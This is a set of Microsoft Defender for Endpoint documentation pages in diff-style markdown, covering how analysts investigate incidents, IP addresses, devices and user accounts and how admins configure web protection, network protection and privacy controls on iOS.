-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-Investigate incidents that affect your network, understand what they mean, and collate evidence to resolve them.
-
-When you investigate an incident, you'll see:
--- Incident details-- Incident comments and actions-- Tabs (alerts, devices, investigations, evidence, graph)-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4qLUV]
-
-## Analyze incident details
-
-> [!TIP]
-> For a limited time during January 2024, when you visit the **Incidents** page, Defender Boxed appears. Defender Boxed highlights your organization's security successes, improvements, and response actions during 2023. To reopen Defender Boxed, in the Microsoft Defender portal, go to **Incidents**, and then select **Your Defender Boxed**.
-
-Click an incident to see the **Incident pane**. Select **Open incident page** to see the incident details and related information (alerts, devices, investigations, evidence, graph).
--
-### Alerts
-
-You can investigate the alerts and see how they were linked together in an incident. Alerts are grouped into incidents based on the following reasons:
--- Automated investigation - The automated investigation triggered the linked alert while investigating the original alert-- File characteristics - The files associated with the alert have similar characteristics-- Manual association - A user manually linked the alerts-- Proximate time - The alerts were triggered on the same device within a certain timeframe-- Same file - The files associated with the alert are exactly the same-- Same URL - The URL that triggered the alert is exactly the same--
-You can also manage an alert and see alert metadata along with other information. For more information, see [Investigate alerts](investigate-alerts.md).
-
-### Devices
-
-You can also investigate the devices that are part of, or related to, a given incident. For more information, see [Investigate devices](investigate-machines.md).
--
-### Investigations
-
-Select **Investigations** to see all the automatic investigations launched by the system in response to the incident alerts.
--
-## Going through the evidence
-
-Microsoft Defender for Endpoint automatically investigates all the incidents' supported events and suspicious entities in the alerts, providing you with autoresponse and information about the important files, processes, services, and more.
-
-Each of the analyzed entities will be marked as infected, remediated, or suspicious.
--
-## Visualizing associated cybersecurity threats
-
-Microsoft Defender for Endpoint aggregates the threat information into an incident so you can see the patterns and correlations coming in from various data points. You can view such correlation through the incident graph.
-
-### Incident graph
-
-The **Graph** tells the story of the cybersecurity attack. For example, it shows you what was the entry point, which indicator of compromise or activity was observed on which device. etc.
--
-You can click the circles on the incident graph to view the details of the malicious files, associated file detections, how many instances have there been worldwide, whether it's been observed in your organization, if so, how many instances.
--
-## Related topics
--- [Incidents queue](/microsoft-365/security/defender-endpoint/view-incidents-queue)-- [Investigate incidents in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/investigate-incidents)-- [Manage Microsoft Defender for Endpoint incidents](/microsoft-365/security/defender-endpoint/manage-incidents)
security Investigate Ip https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-ip.md
- Title: Investigate an IP address associated with an alert
-description: Use the investigation options to examine possible communication between devices and external IP addresses.
------- m365-security-- tier2-- mde-edr- Previously updated : 04/24/2018---
-# Investigate an IP address associated with a Microsoft Defender for Endpoint alert
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-Examine possible communication between your devices and external internet protocol (IP) addresses.
-
-Identifying all devices in the organization that communicated with a suspected or known malicious IP address, such as Command and Control (C2) servers, helps determine the potential scope of breach, associated files, and infected devices.
-
-You can find information from the following sections in the IP address view:
--- IP geo information-- Alerts related to this IP-- IP in organization observations-- Prevalence in organization-
-## IP geo information
-
-In the left pane, the page provides IP details (if available).
-- Organization (ISP)-- ASN-- Country-- State-- City-- Carrier-- Latitude-- Longitude-- Postal code-
-## Alerts related to this IP
-
-The **Alerts related to this IP** section provides a list of alerts that are associated with the IP.
-
-## IP observed in organization
-
-The **IP observed in organization** section provides a list of devices that have a connection with this IP and the last event details for each device (the list is limited to 100 devices).
-
-## Prevalence
-
-The **Prevalence** section displays how many devices have connected to this IP address, and when the IP was first and last seen. You can filter the results of this section by time period; the default period is 30 days.
-
-**Investigate an external IP:**
-
-1. Enter the IP address in the **Search** field.
-2. Select the IP suggestion box and open the IP side panel.
-3. Select **Enter**.
-
-Details about the IP address are displayed, including: registration details (if available), prevalence of devices in the organization that communicated with this IP Address (during selectable time period), and the devices in the organization that were observed communicating with this IP address.
-
-> [!NOTE]
-> Search results will only be returned for IP addresses observed in communication with devices in the organization.
-
-Use the search filters to define the search criteria. You can also use the timeline search box to filter the displayed results of all devices in the organization observed communicating with the IP address, the file associated with the communication and the last date observed.
-
-Clicking any of the device names will take you to that device's view, where you can continue to investigate reported alerts, behaviors, and events.
-
-## Related topics
--- [View and organize the Microsoft Defender for Endpoint Alerts queue](alerts-queue.md)-- [Manage Microsoft Defender for Endpoint alerts](manage-alerts.md)-- [Investigate Microsoft Defender for Endpoint alerts](investigate-alerts.md)-- [Investigate a file associated with a Microsoft Defender for Endpoint alert](investigate-files.md)-- [Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md)-- [Investigate a domain associated with a Microsoft Defender for Endpoint alert](investigate-domain.md)-- [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)
security Investigate Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-machines.md
- Title: Investigate devices in the Defender for Endpoint Devices list
-description: Investigate affected devices by reviewing alerts, network connection information, adding device tags and groups, and checking the service health.
------- m365-security-- tier2-- mde-edr-- Previously updated : 02/21/2024--
-# Investigate devices in the Microsoft Defender for Endpoint Devices list
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigatemachines-abovefoldlink)
-
-Investigate the details of an alert raised on a specific device to identify other behaviors or events that might be related to the alert or the potential scope of the breach.
-
-> [!NOTE]
-> As part of the investigation or response process, you can collect an investigation package from a device. Here's how: [Collect investigation package from devices](/microsoft-365/security/defender-endpoint/respond-machine-alerts#collect-investigation-package-from-devices).
-
-You can select on affected devices whenever you see them in the portal to open a detailed report about that device. Affected devices are identified in the following areas:
--- [Devices list](investigate-machines.md)-- [Alerts queue](alerts-queue.md)-- Any individual alert-- Any individual file details view-- Any IP address or domain details view-
-When you investigate a specific device, you see:
--- Device details-- Response actions-- Tabs (overview, alerts, timeline, security recommendations, software inventory, discovered vulnerabilities, missing KBs)-- Cards (active alerts, logged on users, security assessment, device health status)--
-> [!NOTE]
-> Due to product constrains, the device profile does not consider all cyber evidence when determining the 'Last Seen' timeframe (as seen on the device page as well).
-> For example, the 'Last seen' value in the Device page may show an older time frame even though more recent alerts or data is available in the machine's timeline.
-
-## Device details
-
-The device details section provides information such as the domain, OS, and health state of the device. If there's an investigation package available on the device, you see a link that allows you to download the package.
-
-## Response actions
-
-Response actions run along the top of a specific device page and include:
--- View in map-- Device value-- Set criticality-- Manage tags-- Isolate device-- Restrict app execution-- Run antivirus scan-- Collect investigation package-- Initiate Live Response Session-- Initiate automated investigation-- Consult a threat expert-- Action center-
-You can take response actions in the Action center, in a specific device page, or in a specific file page.
-
-For more information on how to take action on a device, see [Take response action on a device](respond-machine-alerts.md).
-
-For more information, see [Investigate user entities](investigate-user.md).
-
-> [!NOTE]
-> View in map and set criticality are features from Microsoft Exposure Management, which is currently in public preview.
-
-## Tabs
-
-The tabs provide relevant security and threat prevention information related to the device. In each tab, you can customize the columns that are shown by selecting **Customize columns** from the bar above the column headers.
-
-### Overview
-
-The **Overview** tab displays the [cards](#cards) for active alerts, logged on users, and security assessment.
--
-### Incidents and alerts
-
-The **Incidents and alerts** tab provides a list of incidents and alerts that are associated with the device. This list is a filtered version of the [Alerts queue](alerts-queue.md), and shows a short description of the incident, alert, severity (high, medium, low, informational), status in the queue (new, in progress, resolved), classification (not set, false alert, true alert), investigation state, category of alert, who is addressing the alert, and last activity. You can also filter the alerts.
--
-When an alert is selected, a fly-out appears. From this panel you can manage the alert and view more details such as incident number and related devices. Multiple alerts can be selected at a time.
-
-To see a full page view of an alert, select the title of the alert.
-
-### Timeline
-
-The **Timeline** tab provides a chronological view of the events and associated alerts that have been observed on the device. This can help you correlate any events, files, and IP addresses in relation to the device.
-
-The timeline also enables you to selectively drill down into events that occurred within a given time period. You can view the temporal sequence of events that occurred on a device over a selected time period. To further control your view, you can filter by event groups or customize the columns.
-
-> [!NOTE]
-> For firewall events to be displayed, you'll need to enable the audit policy, see [Audit Filtering Platform connection](/windows/security/threat-protection/auditing/audit-filtering-platform-connection).
->
-> Firewall covers the following events:
->
-> - [5025](/windows/security/threat-protection/auditing/event-5025) - firewall service stopped
-> - [5031](/windows/security/threat-protection/auditing/event-5031) - application blocked from accepting incoming connections on the network
-> - [5157](/windows/security/threat-protection/auditing/event-5157) - blocked connection
--
-Some of the functionality includes:
--- Search for specific events
- - Use the search bar to look for specific timeline events.
-- Filter events from a specific date
- - Select the calendar icon in the upper left of the table to display events in the past day, week, 30 days, or custom range. By default, the device timeline is set to display the events from the past 30 days.
- - Use the timeline to jump to a specific moment in time by highlighting the section. The arrows on the timeline pinpoint automated investigations
-- Export detailed device timeline events
- - Export the device timeline for the current date or a specified date range up to seven days.
-
-More details about certain events are provided in the **Additional information** section. These details vary depending on the type of event, for example:
--- Contained by Application Guard - the web browser event was restricted by an isolated container-- Active threat detected - the threat detection occurred while the threat was running-- Remediation unsuccessful - an attempt to remediate the detected threat was invoked but failed-- Remediation successful - the detected threat was stopped and cleaned-- Warning bypassed by user - the Windows Defender SmartScreen warning was dismissed and overridden by a user-- Suspicious script detected - a potentially malicious script was found running-- The alert category - if the event led to the generation of an alert, the alert category (**Lateral Movement**, for example) is provided-
-#### Event details
-
-Select an event to view relevant details about that event. A panel displays to show general event information. When applicable and data is available, a graph showing related entities and their relationships are also shown.
-
-To further inspect the event and related events, you can quickly run an [advanced hunting](advanced-hunting-overview.md) query by selecting **Hunt for related events**. The query returns the selected event and the list of other events that occurred around the same time on the same endpoint.
--
-### Security recommendations
-
-**Security recommendations** are generated from Microsoft Defender for Endpoint's [Vulnerability Management](tvm-dashboard-insights.md) capability. Selecting a recommendation shows a panel where you can view relevant details such as description of the recommendation and the potential risks associated with not enacting it. See [Security recommendation](tvm-security-recommendation.md) for details.
----
-### Security policies
-
-The **Security policies** tab shows the endpoint security policies that are applied on the device. You see a list of policies, type, status, and last check-in time. Selecting the name of a policy takes you to the policy details page where you can see the policy settings status, applied devices, and assigned groups.
----
-### Software inventory
-
-The **Software inventory** tab lets you view software on the device, along with any weaknesses or threats. Selecting the name of the software takes you to the software details page where you can view security recommendations, discovered vulnerabilities, installed devices, and version distribution. See [Software inventory](tvm-software-inventory.md) for details.
--
-### Discovered vulnerabilities
-
-The **Discovered vulnerabilities** tab shows the name, severity, and threat insights of discovered vulnerabilities on the device. If you select a specific vulnerability, you see a description and details.
--
-### Missing KBs
-
-The **Missing KBs** tab lists the missing security updates for the device.
--
-## Cards
-
-### Active alerts
-
-The **Azure Advanced Threat Protection** card displays a high-level overview of alerts related to the device and their risk level, if you're using the Microsoft Defender for Identity feature, and there are any active alerts. More information is available in the **Alerts** drill down.
--
-> [!NOTE]
-> You'll need to enable the integration on both Microsoft Defender for Identity and Defender for Endpoint to use this feature. In Defender for Endpoint, you can enable this feature in advanced features. For more information on how to enable advanced features, see [Turn on advanced features](advanced-features.md).
-
-### Logged on users
-
-The **Logged on users** card shows how many users logged on in the past 30 days, along with the most and least frequent users. Selecting the **See all users** link opens the details pane, which displays information such as user type, sign-in type, and when the user was first and last seen. For more information, see [Investigate user entities](investigate-user.md).
--
-> [!NOTE]
-> The 'Most frequent' user value is calculated only based on evidence of users who successfully logged on interactively.
-> However, the **All users** side-pane calculates all sorts of user logons so it is expected to see more frequent users in the side-pane, given that those users may not be interactive.
-
-### Security assessments
-
-The **Security assessments** card shows the overall exposure level, security recommendations, installed software, and discovered vulnerabilities. A device's exposure level is determined by the cumulative impact of its pending security recommendations.
--
-### Device health status
-
-The **Device health status** card shows a summarized health report for the specific device. One of the following messages is displayed at the top of the card to indicate the overall status of the device (listed in order of highest to lowest priority):
--- Defender Antivirus not active-- Security intelligence isn't up to date-- Engine isn't up to date-- Quick scan failed-- Full scan failed-- Platform isn't up to date-- Security intelligence update status is unknown-- Engine update status is unknown-- Quick scan status is unknown-- Full scan status is unknown-- Platform update status is unknown-- Device is up to date-- Status not available for macOS & Linux-
-Other information in the card includes: the last full scan, last quick scan, security intelligence update version, engine update version, platform update version, and Defender Antivirus mode.
-
-A grey circle indicates that the data is unknown.
-
-> [!NOTE]
-> The overall status message for macOS and Linux devices currently shows up as 'Status not available for macOS & Linux'. Currently, the status summary is only available for Windows devices. All other information in the table is up to date to show the individual states of each device health signal for all supported platforms.
-
-To gain an in-depth view of the device health report, you can go to **Reports > Devices health**. For more information, see [Device health and compliance report in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/machine-reports).
-
-> [!NOTE]
-> The date and time for Defender Antivirus mode is currently not available.
--
-## Related articles
--- [View and organize the Microsoft Defender for Endpoint Alerts queue](alerts-queue.md)-- [Manage Microsoft Defender for Endpoint alerts](manage-alerts.md)-- [Investigate Microsoft Defender for Endpoint alerts](investigate-alerts.md)-- [Investigate a file associated with a Defender for Endpoint alert](investigate-files.md)-- [Investigate an IP address associated with a Defender for Endpoint alert](investigate-ip.md)-- [Investigate a domain associated with a Defender for Endpoint alert](investigate-domain.md)-- [Investigate a user account in Defender for Endpoint](investigate-user.md)-- [Security recommendation](tvm-security-recommendation.md)-- [Software inventory](tvm-software-inventory.md)-
security Investigate User https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-user.md
- Title: Investigate a user account in Microsoft Defender for Endpoint
-description: Investigate a user account for potential compromised credentials or pivot on the associated user account during an investigation.
------- m365-security-- tier2-- mde-edr- Previously updated : 04/24/2018---
-# Investigate a user account in Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigatgeuser-abovefoldlink)
-
-## Investigate user account entities
-
-Identify user accounts with the most active alerts (displayed on dashboard as "Users at risk") and investigate cases of potential compromised credentials, or pivot on the associated user account when investigating an alert or device to identify possible lateral movement between devices with that user account.
-
-You can find user account information in the following views:
--- Dashboard-- Alert queue-- Device details page-
-A clickable user account link is available in these views, which take you to the user account details page where more details about the user account are shown.
-
-When you investigate a user account entity, you can see:
--- User account details, Microsoft Defender for Identity alerts, and logged on devices, role, logon type, and other details-- Overview of the incidents and user's devices-- Alerts related to this user-- Observed in organization (devices logged on to)--
-### User details
-
-The **User details** pane on left provides information about the user, such as related open incidents, active alerts, SAM name, SID, Microsoft Defender for Identity alerts, number of devices the user is logged on to, when the user was first and last seen, role, and logon types. Depending on the integration features you've enabled, you can see other details. For example, if you enable the Skype for business integration, you're able to contact the user from the portal. The **Azure ATP alerts** section contains a link that takes you to the Microsoft Defender for Identity page, if you've enabled the Microsoft Defender for Identity feature, and there are alerts related to the user. The Microsoft Defender for Identity page provides more information about the alerts.
-
-> [!NOTE]
-> You'll need to enable the integration on both Microsoft Defender for Identity and Defender for Endpoint to use this feature. In Defender for Endpoint, you can enable this feature in advanced features. For more information on how to enable advanced features, see [Turn on advanced features](advanced-features.md).
-
-The Overview, Alerts, and Observed in organization are different tabs that display various attributes about the user account.
-
-> [!NOTE]
-> For Linux devices, information about logged in users is not displayed.
-
-### Overview
-
-The **Overview** tab shows the incidents details and a list of the devices that the user has logged on to. You can expand these to see details of the log-on events for each device.
-
-### Alerts
-
-The **Alerts** tab provides a list of alerts that are associated with the user account. This list is a filtered view of the [Alert queue](alerts-queue.md), and shows alerts where the user context is the selected user account, the date when the last activity was detected, a short description of the alert, the device associated with the alert, the alert's severity, the alert's status in the queue, and who is assigned the alert.
-
-### Observed in organization
-
-The **Observed in organization** tab allows you to specify a date range to see a list of devices where this user was observed logged on to, the most frequent and least frequent logged on user account for each of these devices, and total observed users on each device.
-
-Selecting an item on the Observed in organization table expands the item, revealing more details about the device. Directly selecting a link within an item sends you to the corresponding page.
-
-## Search for specific user accounts
-
-1. Select **User** from the **Search bar** drop-down menu.
-2. Enter the user account in the **Search** field.
-3. Click the search icon or press **Enter**.
-
-A list of users matching the query text is displayed. You can see the user account's domain and name, when the user account was last seen, and the total number of devices it was observed logged on to in the last 30 days.
-
-You can filter the results by the following time periods:
--- 1 day-- 3 days-- 7 days-- 30 days-- 6 months-
-## Related articles
--- [View and organize the Microsoft Defender for Endpoint Alerts queue](alerts-queue.md)-- [Manage Microsoft Defender for Endpoint alerts](manage-alerts.md)-- [Investigate Microsoft Defender for Endpoint alerts](investigate-alerts.md)-- [Investigate a file associated with a Defender for Endpoint alert](investigate-files.md)-- [Investigate devices in the Defender for Endpoint Devices list](investigate-machines.md)-- [Investigate an IP address associated with a Defender for Endpoint alert](investigate-ip.md)-- [Investigate a domain associated with a Defender for Endpoint alert](investigate-domain.md)
security Ios Configure Features https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-configure-features.md
- Title: Configure Microsoft Defender for Endpoint on iOS features
-description: Describes how to deploy Microsoft Defender for Endpoint on iOS features.
------- m365-security-- tier3-- mde-ios-- Previously updated : 12/18/2020--
-# Configure Microsoft Defender for Endpoint on iOS features
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> [!NOTE]
-> Defender for Endpoint on iOS would use a VPN in order to provide the Web Protection feature. This is not a regular VPN and is a local/self-looping VPN that does not take traffic outside the device.
-
-## Conditional Access with Defender for Endpoint on iOS
-
-Microsoft Defender for Endpoint on iOS along with Microsoft Intune and Microsoft Entra ID enables enforcing Device compliance and Conditional Access policies based on device risk score. Defender for Endpoint is a Mobile Threat Defense (MTD) solution that you can deploy to use this capability via Intune.
-
-For more information about how to set up Conditional Access with Defender for Endpoint on iOS, see [Defender for Endpoint and Intune](/mem/intune/protect/advanced-threat-protection).
-
-## Web Protection and VPN
-
-By default, Defender for Endpoint on iOS includes and enables the web protection feature. [Web protection](web-protection-overview.md) helps to secure devices against web threats and protect users from phishing attacks. Anti-phishing and custom indicators (URL and Domain) are supported as part of Web Protection. IP based custom indicators are currently not supported on iOS. Web Content Filtering is currently not supported on mobile platforms (Android and iOS).
-
-Defender for Endpoint on iOS uses a VPN in order to provide this capability. Note that the VPN is local, and unlike traditional VPN, network traffic isn't sent outside the device.
-
-While enabled by default, there might be some cases that require you to disable VPN. For example, you want to run some apps that don't work when a VPN is configured. In such cases, you can choose to disable VPN from the app on the device by following these steps:
-
-1. On your iOS device, open the **Settings** app, select **General** and then **VPN**.
-
-2. Select the **i** button for Microsoft Defender for Endpoint.
-
-3. Toggle off **Connect On Demand** to disable VPN.
-
- :::image type="content" source="media/ios-vpn-config.png" alt-text="The toggle button for the VPN config Connect on demand option" lightbox="media/ios-vpn-config.png":::
-
-> [!NOTE]
-> Web Protection isn't available when VPN is disabled. To re-enable Web Protection, open the Microsoft Defender for Endpoint app on the device and click or tap **Start VPN**.
-
-## Disable Web Protection
-
-Web Protection is one of the key features of Defender for Endpoint and it requires a VPN to provide that capability. The VPN used is a local/loopback VPN and not a traditional VPN, however there are several reasons for which customers might not prefer the VPN. Customers who don't want to set up a VPN, there's an option to disable **Web Protection** and deploy Defender for Endpoint without that feature. Other Defender for Endpoint features continue to work.
-
-This configuration is available for both the enrolled (MDM) devices and unenrolled (MAM) devices. For customers with MDM, admins can configure the **Web Protection** through Managed devices in the App Config. For customers without enrollment, using MAM, admins can configure the **Web Protection** through Managed apps in the App Config.
-
-### Configure Web Protection
-
-1. **Disable Web Protection(MDM)** Use the following steps to disable **Web Protection** for enrolled devices.
-
- - In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Apps** \> **App configuration policies** \> **Add** \> **Managed devices**.
- - Give the policy a name, **Platform \> iOS/iPadOS**.
- - Select Microsoft Defender for Endpoint as the target app.
- - In Settings page, select Use configuration designer and add **WebProtection** as the key and value type as **String**.
- - By default, **WebProtection= true**.
- - Admin needs to make **WebProtection = false** to switch off the web protection.
- - Defender sends the heartbeat to the Microsoft Defender portal whenever user opens the app.
- - Select **Next** and assign this profile to targeted devices/users.
-
-1. **Disable Web Protection(MAM)** Use the following steps to disable **Web Protection** for unenrolled devices.
-
- - In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Apps** \> **App configuration policies** \> **Add** \> **Managed apps**.
- - Give the policy a name.
- - Under the Select Public Apps, choose Microsoft Defender for Endpoint as the target app.
- - In Settings page, under the General Configuration Settings, add **WebProtection** as the key and value as **false**.
- - By default, **WebProtection= true**.
- - Admin needs to make **WebProtection = false** to switch off the web protection.
- - Defender sends the heartbeat to the Microsoft Defender portal whenever user opens the app.
- - Select **Next** and assign this profile to targeted devices/users.
-
-## Configure Network Protection
-
-Network protection in Microsoft Defender for endpoint is disabled by default. Admins can use the following steps to configure Network Protection. This configuration is available for both enrolled devices through MDM config and unenrolled devices through MAM config.
-
-> [!NOTE]
-> Only one policy should be created for Network Protection, either MDM or MAM.
-
-### For enrolled devices (MDM)
-
-Follow the below steps for setting up MDM configuration for enrolled devices for Network protection.
-
-1. In the Microsoft Intune admin center, navigate to **Apps** \> **App configuration policies** \> **Add** \> **Managed devices**.
-
-2. Provide name and description for the policy. Under **Platform**, choose **iOS/iPad**.
-
-3. In the targeted app, choose **Microsoft Defender for Endpoint**.
-
-4. In the Settings page, choose configuration settings format **Use configuration designer**.
-
-5. Add 'DefenderNetworkProtectionEnable' as the configuration key, value type as 'String' and value as 'true' to enable Network Protection. (Network protection is disabled by default.)
-
- :::image type="content" source="medimconfig-key.png":::
-
-6. For other configurations related to Network protection, add the following keys, choose the corresponding value type and value.
-
- | Key | Value Type | Default (true-enable, false-disable) | Description |
- | | | | |
- | `DefenderOpenNetworkDetection` | Integer | 0 | 1 - Audit, 0 - Disable(default), 2 - Enable. This setting is managed by an IT Admin to audit, disable, or enable open network detection, respectively. In 'Audit' mode, alerts is sent only to the ATP portal with no end-user experience. For end-user experience, set the config to 'Enable' mode.|
- | `DefenderEndUserTrustFlowEnable` | String | false | true - enable, false - disable; This setting is used by IT admins to enable or disable the end user in-app experience to trust and untrust the unsecure and suspicious networks. |
- | `DefenderNetworkProtectionAutoRemediation` | String | true | true - enable, false - disable; This setting is used by the IT admin to enable or disable the remediation alerts that are sent when a user performs remediation activities like switching to safer WIFI access points or deleting suspicious certificates detected by Defender. |
- | `DefenderNetworkProtectionPrivacy` | String | true | true - enable, false - disable; This setting is managed by IT admin to enable or disable privacy in network protection. |
-
-7. In the Assignments section, admin can choose groups of users to include and exclude from the policy.
-
-8. Review and create the configuration policy.
-
-### For unenrolled devices (MAM)
-
-Follow the below steps for setting up MAM config for unenrolled devices for Network protection (Authenticator device registration is required for MAM configuration) in iOS devices. Network Protection initialization requires the end user to open the app once.
-
-1. In the Microsoft Intune admin center, navigate to **Apps** \> **App configuration policies** \> **Add** \> **Managed apps** \> **Create a new App configuration policy**.
-
- :::image type="content" source="media/addiosconfig.png" alt-text="Add configuration policy." lightbox="media/addiosconfig.png":::
-
-2. Provide a name and description to uniquely identify the policy. Then select **Select Public apps**, and choose **Microsoft Defender for Platform iOS/iPadOS**.
-
- :::image type="content" source="media/nameiosconfig.png" alt-text="Name the configuration." lightbox="media/nameiosconfig.png":::
-
-3. On the Settings page, add **DefenderNetworkProtectionEnable** as the key and the value as `true` to enable network protection. (Network protection is disabled by default.)
-
- :::image type="content" source="media/addiosconfigvalue.png" alt-text="Add configuration value." lightbox="media/addiosconfigvalue.png":::
-
-4. For other configurations related to network protection, add the following keys and appropriate corresponding value.
-
- |Key| Default (true - enable, false - disable)|Description|
- ||||
- |`DefenderOpenNetworkDetection`|0| 1 - Audit, 0 - Disable (default), 2 - Enable. This setting is managed by an IT admin to enable, audit, or disable open network detection. In Audit mode, alerts are sent only to the ATP portal with no user side experience. For user experience, set the config to "Enable" mode.|
- |`DefenderEndUserTrustFlowEnable`| false | true - enable, false - disable; This setting is used by IT admins to enable or disable the end user in-app experience to trust and untrust the unsecure and suspicious networks.|
- |`DefenderNetworkProtectionAutoRemediation`| true |true - enable, false - disable; This setting is used by the IT admin to enable or disable the remediation alerts that are sent when a user performs remediation activities like switching to safer WIFI access points or deleting suspicious certificates detected by Defender.|
- |`DefenderNetworkProtectionPrivacy`| true |true - enable, false - disable; This setting is managed by IT admin to enable or disable privacy in network protection.|
-
-5. In the **Assignments** section, an admin can choose groups of users to include and exclude from the policy.
-
- :::image type="content" source="media/assigniosconfig.png" alt-text="Assign configuration." lightbox="media/assigniosconfig.png":::
-
-6. Review and create the configuration policy.
-
-## Coexistence of multiple VPN profiles
-
-Apple iOS doesn't support multiple device-wide VPNs to be active simultaneously. While multiple VPN profiles can exist on the device, only one VPN can be active at a time.
-
-## Configure Microsoft Defender for Endpoint risk signal in app protection policy (MAM)
-
-Microsoft Defender for Endpoint on iOS enables the App Protection Policy scenario. End-users can install the latest version of the app directly from the Apple app store. Ensure the device is registered to Authenticator with the same account being used to onboard in Defender for successful MAM registration.
-
-Microsoft Defender for Endpoint can be configured to send threat signals to be used in App Protection Policies (APP, also known as MAM) on iOS/iPadOS. With this capability, you can use Microsoft Defender for Endpoint to protect access to corporate data from unenrolled devices as well.
-
-Follow the steps in the following link to set up app protection policies with Microsoft Defender for Endpoint [Configure Defender risk signals in app protection policy (MAM)](ios-install-unmanaged.md)
-
-For more details on MAM or app protection policy, see [iOS app protection policy settings](/mem/intune/apps/app-protection-policy-settings-ios).
-
-## Privacy Controls
-
-Microsoft Defender for Endpoint on iOS enables Privacy Controls for both the Admins and the End Users. This includes the controls for enrolled (MDM) and unenrolled (MAM) devices.
-
-For Customers with MDM, admins can configure the Privacy Controls through Managed devices in the App Config. For Customers without enrollment, using MAM, admins can configure the Privacy Controls through Managed apps in the App Config. End Users will also have the ability to configure the Privacy Settings from the Defender App settings.
-
-### Configure privacy in phish alert report
-
-Customers can now enable privacy control for the phish report sent by Microsoft Defender for Endpoint on iOS so that the domain name isn't included as part of a phish alert whenever a phish website is detected and blocked by Microsoft Defender for Endpoint.
-
-1. **Admin Privacy Controls (MDM)** Use the following steps to enable privacy and not collect the domain name as part of the phish alert report for enrolled devices.
-
- 1. In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Apps** \> **App configuration policies** \> **Add** \> **Managed devices**.
-
- 2. Give the policy a name, **Platform \> iOS/iPadOS**, select the profile type.
-
- 3. Select **Microsoft Defender for Endpoint** as the target app.
-
- 4. On the Settings page, select **Use configuration designer** and add **DefenderExcludeURLInReport** as the key and value type as **Boolean**.
-
- - To enable privacy and not collect the domain name, enter the value as `true` and assign this policy to users. By default, this value is set to `false`.
- - For users with key set as `true`, the phish alert doesn't contain the domain name information whenever a malicious site is detected and blocked by Defender for Endpoint.
-
- 5. Select **Next** and assign this profile to targeted devices/users.
-
-2. **Admin Privacy Controls (MAM)** Use the following steps to enable privacy and not collect the domain name as part of the phish alert report for unenrolled devices.
-
- 1. In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Apps** \> **App configuration policies** \> **Add** \> **Managed apps**.
-
- 2. Give the policy a name.
-
- 3. Under **Select Public Apps**, choose **Microsoft Defender for Endpoint** as the target app.
-
- 4. On the Settings page, under the **General Configuration Settings**, add **DefenderExcludeURLInReport** as the key and value as `true`.
-
- - To enable privacy and not collect the domain name, enter the value as `true` and assign this policy to users. By default, this value is set to `false`.
- - For users with key set as `true`, the phish alert doesn't contain the domain name information whenever a malicious site is detected and blocked by Defender for Endpoint.
-
- 5. Select **Next** and assign this profile to targeted devices/users.
-
-3. **End User Privacy Controls** These controls help the end user to configure the information shared to their organization.
-
- For Supervised devices, End User controls aren't visible. Your admin decides and controls the settings. However, for Unsupervised devices, the control is displayed under the **Settings \> Privacy**.
-
- - Users see a toggle for **Unsafe Site Info**.
- - This toggle is only visible if Admin has set **DefenderExcludeURLInReport = true**.
- - If enabled by an Admin, Users can decide if they want to send the unsafe site info to their Organization or not.
- - By default, it's set to `false`. The unsafe site information isn't sent.
